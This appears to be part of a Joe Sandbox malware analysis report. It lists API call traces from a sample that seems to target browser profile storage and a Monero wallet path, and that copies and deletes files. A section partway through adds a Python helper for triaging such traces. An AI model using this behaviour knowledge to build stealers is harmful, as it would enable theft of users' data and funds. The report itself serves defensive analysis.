                              • API String ID:
                              • Opcode ID: 796b4b91c18282edec26cf85ae6e2adfd9cc496d4d79ce656db4edd5afc9d758
                              • Instruction ID: f93d85db9a571d7614897d7e53ef419e004270f0894f177c035c8e5ed4d19de9
                              • Opcode Fuzzy Hash: 796b4b91c18282edec26cf85ae6e2adfd9cc496d4d79ce656db4edd5afc9d758
                              • Instruction Fuzzy Hash: 2F613AF3E082109FE3046E2DDC8577ABBD5EB94310F1A4A3DEAC4D3784E97998158792
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 508183b1661ff9744572721254116aa8fb938ca4d9fa0fcd2b026d6846324381
                              • Instruction ID: e234c1d32996114c36e29e5e75dc425757174ee98700ec045f2e9f9477986eaa
                              • Opcode Fuzzy Hash: 508183b1661ff9744572721254116aa8fb938ca4d9fa0fcd2b026d6846324381
                              • Instruction Fuzzy Hash: F25113B3E082145BE3046E3CDC4537AB7D2EF80710F1A893CD9C9D7784E978A9458786
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e546507366895132f662f3d6dfe89788d625683aa69f46190670f0a49b3bd103
                              • Instruction ID: fde802bcf6469446606c45d0888284fc19e02872cddbb68db09d292ec48bbc6f
                              • Opcode Fuzzy Hash: e546507366895132f662f3d6dfe89788d625683aa69f46190670f0a49b3bd103
                              • Instruction Fuzzy Hash: 9151F6B3E092209FE3549E28DC84776B7D6DF84320F1B853DEA849B784EA795C0187C6
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 005A86C7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A86FF
                              • lstrcpy.KERNEL32(?,00000000), ref: 005A873C
                              • StrStrA.SHLWAPI(?,0160E5C8), ref: 005A8761
                              • lstrcpyn.KERNEL32(007C93D0,?,00000000), ref: 005A8780
                              • lstrlen.KERNEL32(?), ref: 005A8793
                              • wsprintfA.USER32 ref: 005A87A3
                              • lstrcpy.KERNEL32(?,?), ref: 005A87B9
                              • StrStrA.SHLWAPI(?,0160E5E0), ref: 005A87E6
                              • lstrcpy.KERNEL32(?,007C93D0), ref: 005A8846
                              • StrStrA.SHLWAPI(?,0160E5F8), ref: 005A8873
                              • lstrcpyn.KERNEL32(007C93D0,?,00000000), ref: 005A8892
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                              • String ID: %s%s
                              • API String ID: 2672039231-3252725368
                              • Opcode ID: 33a9fc2a7610865ca48aa3c2643f4f38ba25c2218142ffea1a38b7a1cf543fea
                              • Instruction ID: a3d5a8429d6af8478575f1451cc725412869e5f069262d83390423b0a3a65283
                              • Opcode Fuzzy Hash: 33a9fc2a7610865ca48aa3c2643f4f38ba25c2218142ffea1a38b7a1cf543fea
                              • Instruction Fuzzy Hash: 4F025E72901119EFCB50DB64DD5CEEEBBB9FF48300F14815DEA09A7250DB38AE418BA5
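                               The two API traces in this part of the report (the string-assembly routine above, with its wsprintfA "%s%s" format and repeated StrStrA/lstrcpyn scans, and the FindNextFileA/CopyFileA/DeleteFileA loop in the next entry) are easier to triage once the trace lines are parsed and aggregated per function. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It parses lines in the report's "• api.MODULE(args), ref: ADDR" shape, groups them by function entry, counts calls, collects argument values that recur across calls (in this report those are the global buffer 007C93D0 and the string constant 005C1D5C), and flags API combinations. The sample trace is excerpted from the two entries on this page; the pattern names and the set of APIs behind each are the example's own assumptions, not Joe Sandbox signatures.

```python
"""Triage helper for Joe Sandbox per-function API traces (added example, not Joe Sandbox code)."""
import re
from collections import Counter
from typing import NamedTuple


class ApiCall(NamedTuple):
    api: str
    module: str
    args: tuple
    ref: int  # address of the call site inside the dumped image


# Report line shape: "• api.MODULE(arg,arg), ref: ADDR"; wsprintfA is listed without an argument list.
_CALL_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed sample, excerpted from the two function entries on this page.
SAMPLE_REPORT = """\
APIs
• lstrlen.KERNEL32(00000000), ref: 005A86C7
• lstrcpy.KERNEL32(00000000,00000000), ref: 005A86FF
• lstrcpy.KERNEL32(?,00000000), ref: 005A873C
• StrStrA.SHLWAPI(?,0160E5C8), ref: 005A8761
• lstrcpyn.KERNEL32(007C93D0,?,00000000), ref: 005A8780
• lstrlen.KERNEL32(?), ref: 005A8793
• wsprintfA.USER32 ref: 005A87A3
• lstrcpy.KERNEL32(?,?), ref: 005A87B9
• StrStrA.SHLWAPI(?,0160E5E0), ref: 005A87E6
• lstrcpy.KERNEL32(?,007C93D0), ref: 005A8846
• StrStrA.SHLWAPI(?,0160E5F8), ref: 005A8873
• lstrcpyn.KERNEL32(007C93D0,?,00000000), ref: 005A8892
Strings
Memory Dump Source
APIs
• lstrcpy.KERNEL32(00000000,005BD014), ref: 00591E9F
• lstrlen.KERNEL32(005C1D5C), ref: 00591EEE
• lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591F1A
• lstrcpy.KERNEL32(00000000,00000000), ref: 0059222D
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00592256
• DeleteFileA.KERNEL32(00000000), ref: 005922F7
• FindNextFileA.KERNEL32(00000000,?), ref: 00592344
• FindClose.KERNEL32(00000000), ref: 00592353
Memory Dump Source
"""

# Assumed API combinations worth flagging; every listed API must occur in the same function.
PATTERNS = {
    "walk-copy-delete files": {"FindNextFileA", "CopyFileA", "DeleteFileA"},
    "format-string assembly": {"wsprintfA", "lstrcpy"},
    "substring parsing": {"StrStrA", "lstrcpyn"},
}


def parse_api_lists(report_text: str) -> list[list[ApiCall]]:
    """Return one call list per function entry. An 'APIs' heading opens an entry and
    the next non-bullet line (e.g. 'Strings', 'Memory Dump Source') closes it.
    Entries whose API list is empty in the report are dropped."""
    entries, current = [], None
    for line in report_text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            entries.append(current)
            continue
        m = _CALL_RE.match(line)
        if m and current is not None:
            raw = m.group("args") or ""
            args = tuple(a.strip() for a in raw.split(",") if a.strip())
            current.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
        elif current is not None and stripped:
            current = None
    return [e for e in entries if e]


def classify(calls: list[ApiCall]) -> list[str]:
    names = {c.api for c in calls}
    return sorted(name for name, needed in PATTERNS.items() if needed <= names)


def summarize(calls: list[ApiCall]) -> dict:
    counts = Counter(c.api for c in calls)
    refs = [c.ref for c in calls]
    # Argument values seen in more than one call are usually global buffers or string constants;
    # '?' (unresolved) and 00000000 carry no information and are skipped.
    arg_counts = Counter(a for c in calls for a in c.args if a not in ("?", "00000000"))
    return {
        "calls": len(calls),
        "range": (min(refs), max(refs)),
        "top": counts.most_common(3),
        "modules": sorted({c.module for c in calls}),
        "shared_args": [a for a, n in arg_counts.items() if n > 1],
        "patterns": classify(calls),
    }


def triage(report_text: str) -> list[dict]:
    return [summarize(e) for e in parse_api_lists(report_text)]


if __name__ == "__main__":
    for s in triage(SAMPLE_REPORT):
        print(f"{s['range'][0]:08X}-{s['range'][1]:08X} calls={s['calls']} "
              f"top={s['top']} shared={s['shared_args']} patterns={s['patterns']}")
```

                               Run against a whole report, the address range of each flagged entry points straight at the function to open in the dump; the shared-argument list is a cheap way to find the global buffers (here 007C93D0) that several functions pass to each other.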
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00591E9F
                              • lstrlen.KERNEL32(016095F8), ref: 00591EAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591EDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00591EE3
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591EEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591F0E
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591F1A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591F42
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591F4D
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591F58
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591F75
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591F81
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591FAC
                              • lstrlen.KERNEL32(?), ref: 00591FE4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00592004
                              • lstrcat.KERNEL32(00000000,?), ref: 00592012
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00592039
                              • lstrlen.KERNEL32(005C1D5C), ref: 0059204B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059206B
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00592077
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059209D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005920A8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005920D4
                              • lstrlen.KERNEL32(?), ref: 005920EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059210A
                              • lstrcat.KERNEL32(00000000,?), ref: 00592118
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00592142
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059217F
                              • lstrlen.KERNEL32(0160DAC8), ref: 0059218D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005921B1
                              • lstrcat.KERNEL32(00000000,0160DAC8), ref: 005921B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005921F7
                              • lstrcat.KERNEL32(00000000), ref: 00592204
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059222D
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00592256
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00592282
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005922BF
                              • DeleteFileA.KERNEL32(00000000), ref: 005922F7
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00592344
                              • FindClose.KERNEL32(00000000), ref: 00592353
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                              • String ID:
                              • API String ID: 2857443207-0
                              • Opcode ID: 0a23d949791f17f3356279610d5be09545e296e9ece3349725943c4f7a392bb3
                              • Instruction ID: d5aa43f3de175be0d67f8283ae03c46cdfdeed21b3976b87240b1e287cc7c1b0
                              • Opcode Fuzzy Hash: 0a23d949791f17f3356279610d5be09545e296e9ece3349725943c4f7a392bb3
                              • Instruction Fuzzy Hash: D8E11B71A1261BABCF10EFA4DD8DAAE7FB9BF44700F044168F905A7211DB34ED458BA4
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A68D5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A6910
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005A693A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6971
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6996
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A699E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A69C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FolderPathlstrcat
                              • String ID: \..\
                              • API String ID: 2938889746-4220915743
                              • Opcode ID: 9a24fc46925e8415b79a119195273d49fcf79af1e005db9b99eccda376b9d2fc
                              • Instruction ID: 3c1eed1e8ace6336e5658bbcfc59cbe5154819cced44accbfde7e18ee7814794
                              • Opcode Fuzzy Hash: 9a24fc46925e8415b79a119195273d49fcf79af1e005db9b99eccda376b9d2fc
                              • Instruction Fuzzy Hash: 4CF17F70E1121AAFDB21AF74C84DAAE7FB4BF85700F088128E955D7261DB38DD45CBA1
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4753
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4786
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A47AE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A47B9
                              • lstrlen.KERNEL32(\storage\default\), ref: 005A47C4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A47E1
                              • lstrcat.KERNEL32(00000000,\storage\default\), ref: 005A47ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4816
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4821
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4848
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4887
                              • lstrcat.KERNEL32(00000000,?), ref: 005A488F
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A489A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A48B7
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A48C3
                              • lstrlen.KERNEL32(.metadata-v2), ref: 005A48CE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A48EB
                              • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 005A48F7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A491E
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4950
                              • GetFileAttributesA.KERNEL32(00000000), ref: 005A4957
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A49B1
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A49DA
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4A03
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4A2B
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4A5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                              • String ID: .metadata-v2$\storage\default\
                              • API String ID: 1033685851-762053450
                              • Opcode ID: 53ffff1005d8b0fe9d62e7cc736886e73f716eda54db37ba4d64fab5d48a0e7d
                              • Instruction ID: 942e64099c5bab7d5227c318ac6ba2aaea62762d2c5931dc17624a0d407e2e54
                              • Opcode Fuzzy Hash: 53ffff1005d8b0fe9d62e7cc736886e73f716eda54db37ba4d64fab5d48a0e7d
                              • Instruction Fuzzy Hash: 77B16E31A1261BABCF20AFB4DD4EA6F7FA8BF85700F144128B945E7251DB74EC418B94
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A5C15
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 005A5C44
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C75
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C9D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A5CA8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5CD0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5D08
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A5D13
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5D38
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A5D6E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5D96
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A5DA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5DC8
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A5DDA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5DF9
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A5E05
                              • lstrlen.KERNEL32(0160DB88), ref: 005A5E14
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5E37
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A5E42
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5E6C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5E98
                              • GetFileAttributesA.KERNEL32(00000000), ref: 005A5E9F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A5EF7
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A5F66
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A5F98
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A5FDB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6007
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A603F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A60B1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A60D5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2428362635-0
                              • Opcode ID: 2b7198e0ed28e6b7d30819cc61be4fba660839a21bbc2062ad5687d64745204a
                              • Instruction ID: 04998dfab56efb282d56d5435de6773a88d8f78daf5f709536d21616d50334ce
                              • Opcode Fuzzy Hash: 2b7198e0ed28e6b7d30819cc61be4fba660839a21bbc2062ad5687d64745204a
                              • Instruction Fuzzy Hash: 6B029071A0261AAFCF21AF68C88DEAE7FB9BF45300F144128F94597251EB34DD85CB90
                              APIs
                                • Part of subcall function 00591000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00591015
                                • Part of subcall function 00591000: RtlAllocateHeap.NTDLL(00000000), ref: 0059101C
                                • Part of subcall function 00591000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00591039
                                • Part of subcall function 00591000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00591053
                                • Part of subcall function 00591000: RegCloseKey.ADVAPI32(?), ref: 0059105D
                              • lstrcat.KERNEL32(?,00000000), ref: 005910A0
